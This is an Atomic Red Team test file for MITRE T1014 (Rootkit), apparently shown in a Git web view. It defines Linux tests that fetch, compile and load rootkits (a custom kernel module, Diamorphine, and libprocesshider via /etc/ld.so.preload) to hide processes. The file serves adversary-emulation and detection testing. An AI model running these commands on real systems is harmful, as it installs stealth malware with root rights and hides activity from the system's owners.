security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1014/T1014.yaml
T
KillrBunn3 65294196d0 Spelling adjustments (#2448) 
Looking over the YAMLs mostly, only changes for readability or accuracy
2023-05-31 15:50:22 -05:00

170 lines
6.0 KiB
YAML
Raw Permalink Blame History

attack_technique: T1014
display_name: Rootkit
atomic_tests:
- name: Loadable Kernel Module based Rootkit
auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553
description: |
Loadable Kernel Module based Rootkit
supported_platforms:
- linux
input_arguments:
rootkit_source_path:
description: Path to the rootkit source. Used when prerequisites are fetched.
type: path
default: PathToAtomicsFolder/T1014/src/Linux
rootkit_path:
description: Path To rootkit
type: string
default: PathToAtomicsFolder/T1014/bin
rootkit_name:
description: Module name
type: string
default: T1014
dependency_executor_name: bash
dependencies:
- description: |
The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)
prereq_command: |
if [ -f #{rootkit_path}/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
get_prereq_command: |
sudo apt install make
sudo apt install gcc
if [ ! -d /tmp/T1014 ]; then mkdir /tmp/T1014; fi;
cp #{rootkit_source_path}/* /tmp/T1014/
cd /tmp/T1014; make
mkdir #{rootkit_path}
mv /tmp/T1014/#{rootkit_name}.ko #{rootkit_path}/#{rootkit_name}.ko
rm -rf /tmp/T1014
executor:
command: |
sudo insmod #{rootkit_path}/#{rootkit_name}.ko
cleanup_command: |
sudo rmmod #{rootkit_name}
sudo rm -rf #{rootkit_path}
name: sh
elevation_required: true
- name: Loadable Kernel Module based Rootkit
auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f
description: |
Loadable Kernel Module based Rootkit
supported_platforms:
- linux
input_arguments:
rootkit_source_path:
description: Path to the rootkit source. Used when prerequisites are fetched.
type: path
default: PathToAtomicsFolder/T1014/src/Linux
rootkit_name:
description: Module name
type: string
default: T1014
dependency_executor_name: bash
dependencies:
- description: |
The kernel module must exist on disk at specified location (#{rootkit_source_path}/#{rootkit_name}.ko)
prereq_command: |
if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
get_prereq_command: |
sudo apt install make
sudo apt install gcc
if [ ! -d /tmp/T1014 ]; then mkdir /tmp/T1014; touch /tmp/T1014/safe_to_delete; fi;
cp #{rootkit_source_path}/* /tmp/T1014
cd /tmp/T1014; make
sudo cp /tmp/T1014/#{rootkit_name}.ko /lib/modules/$(uname -r)/
[ -f /tmp/T1014/safe_to_delete ] && rm -rf /tmp/T1014
sudo depmod -a
executor:
command: |
sudo modprobe #{rootkit_name}
cleanup_command: |
sudo modprobe -r #{rootkit_name}
sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko
sudo depmod -a
name: sh
elevation_required: true
- name: dynamic-linker based rootkit (libprocesshider)
auto_generated_guid: 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3
description: |
Uses libprocesshider to simulate rootkit behavior by hiding a specific process name via ld.so.preload (see also T1574.006).
supported_platforms:
- linux
input_arguments:
repo:
description: Url of the github repo zip
type: string
default: https://github.com/gianlucaborello/libprocesshider/
rev:
description: Revision of the github repo zip
type: string
default: 25e0587d6bf2137f8792dc83242b6b0e5a72b415
library_path:
description: Full path of the library to add to ld.so.preload
type: string
default: /usr/local/lib/libprocesshider.so
dependency_executor_name: bash
dependencies:
- description: |
The preload library must exist on disk at specified location (#{library_path})
prereq_command: |
if [ -f #{library_path} ]; then exit 0; else exit 1; fi;
get_prereq_command: |
mkdir -p /tmp/atomic && cd /tmp/atomic
curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd libprocesshider-#{rev}
make
cp libprocesshider.so #{library_path}
cp /usr/bin/ping /usr/local/bin/evil_script.py
executor:
command: |
echo #{library_path} | tee -a /etc/ld.so.preload
/usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"
cleanup_command: |
sed -i "\:^#{library_path}:d" /etc/ld.so.preload
rm -rf #{library_path} /usr/local/bin/evil_script.py /tmp/atomic
name: sh
elevation_required: true
- name: Loadable Kernel Module based Rootkit (Diamorphine)
auto_generated_guid: 0b996469-48c6-46e2-8155-a17f8b6c2247
description: |
Loads Diamorphine kernel module, which hides itself and a processes.
supported_platforms:
- linux
input_arguments:
repo:
description: Url of the diamorphine github repo
type: string
default: https://github.com/m0nad/Diamorphine/
rev:
description: Revision of the github repo zip
type: string
default: 898810523aa2033f582a4a5903ffe453334044f9
rootkit_name:
description: Module name
type: string
default: diamorphine
dependency_executor_name: bash
dependencies:
- description: |
The kernel module must exist on disk at specified location (#{rootkit_name}.ko)
prereq_command: |
if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
get_prereq_command: |
mkdir -p /tmp/atomic && cd /tmp/atomic
curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd Diamorphine-#{rev}
make
sudo cp #{rootkit_name}.ko /lib/modules/$(uname -r)/
sudo depmod -a
executor:
command: |
sudo modprobe #{rootkit_name}
ping -c 10 localhost >/dev/null & TARGETPID="$!"
ps $TARGETPID
kill -31 $TARGETPID
ps $TARGETPID || echo "process ${TARGETPID} hidden"
cleanup_command: |
kill -63 1
sudo modprobe -r #{rootkit_name}
sudo rm -rf /lib/modules/$(uname -r)/#{rootkit_name}.ko /tmp/atomic
sudo depmod -a
name: sh
elevation_required: true
Reference in New Issue View Git Blame Copy Permalink